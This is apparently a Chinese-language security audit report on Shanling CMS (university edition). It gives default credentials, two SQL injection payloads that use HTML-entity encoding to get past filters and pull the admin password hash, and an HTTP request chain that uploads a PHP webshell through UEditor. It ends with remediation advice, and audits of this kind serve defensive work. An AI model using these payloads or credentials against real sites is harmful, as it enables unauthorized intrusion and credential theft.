闪灵cms高校版代码审计
字数 1149 2025-08-06 08:35:09
闪灵CMS高校版代码审计报告
系统概述
闪灵CMS高校版是一款基于PHP开发的智能企业建站系统,具有以下特点:
- 允许用户在短时间内快速搭建企业网站
- 无需编程知识即可使用
- 提供在线建站功能
漏洞1:默认密码
漏洞描述
系统安装后存在多个默认用户账户,这些账户使用弱密码且容易被解密。
技术细节
- 默认用户密码存储在数据库中(非管理员账户,仅为普通用户)
- 示例密码:
7FEF6171469E80D32C0559F88B377245(解密后为admin888) - 默认登录凭证:
admin/admin888 - 登录地址:
http://localhost/member/member_login.php
验证方法
- 通过数据库查看默认用户
- 使用默认凭证尝试登录用户后台
影响范围
- 系统默认开启用户登录后台功能
- 实际测试中成功率较高
漏洞2:用户后台UPDATE注入
漏洞位置
member/member_edit.php
漏洞成因
- 参数直接从POST请求获取
- 仅经过
htmlspecialchars过滤 - 直接拼接SQL语句
防护机制分析
function/function.php中有正则表达式检测敏感字符- 匹配到敏感字符会终止程序执行
- 参数还经过
RemoveXSS函数过滤
绕过方法
- 使用HTML实体编码绕过检测
- 例如:
'编码为'
- 例如:
- 通过URL编码进一步处理
验证步骤
- 开启MySQL日志:
set global general_log=ON; show variables LIKE '%general_log%'; - 测试注入效果
利用Payload
%26%2339,M_info=(%26%23115elect a_pwd from sl_admin),M_add=%26%2339
漏洞3:论坛评论INSERT注入
漏洞位置
bbs/item.php
漏洞特点
- 与漏洞2成因相同
- 注入方式改为INSERT注入
利用Payload
aaaaa%26%2339,%26%23392023-01-01%26%2339,7,1,1),(%26%2339aaa%26%2339,(%26%23115elect a_pwd from sl_admin), %26%23391010-02-02%26%2339,7,1,1) %23
漏洞4:管理后台文件上传
漏洞描述
组合漏洞利用,通过修改上传配置实现任意文件上传。
利用步骤
1. 修改上传配置
- 系统后台使用黑名单方式限制上传格式
- 默认不允许上传PHP文件
- 系统包含UE编辑器
2. 具体利用流程
- 修改
config.json文件,添加允许上传PHP:{ "allowFiles": [".php"] } - 后台修改安全配置,允许上传JSON格式文件
- 上传修改后的
config.json覆盖原文件 - 通过UE编辑器上传Webshell
3. 上传Webshell请求示例
POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG33bK0VpwNWgBEHF
Connection: close
------WebKitFormBoundaryG33bK0VpwNWgBEHF
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: application/octet-stream
<? phpinfo(); ?>
------WebKitFormBoundaryG33bK0VpwNWgBEHF--
修复建议
-
默认密码问题:
- 强制用户在首次登录时修改密码
- 删除或禁用默认账户
-
SQL注入防护:
- 使用预处理语句替代直接拼接SQL
- 统一过滤机制,避免多层级过滤不一致
- 加强输入验证
-
文件上传漏洞:
- 使用白名单机制替代黑名单
- 限制配置文件修改权限
- 对上传文件进行内容检查
-
其他建议:
- 定期安全审计
- 保持系统更新
- 最小权限原则配置
总结
闪灵CMS高校版存在多个高危漏洞,攻击者可以利用这些漏洞获取系统权限、窃取敏感数据。建议用户及时更新系统或采取相应防护措施。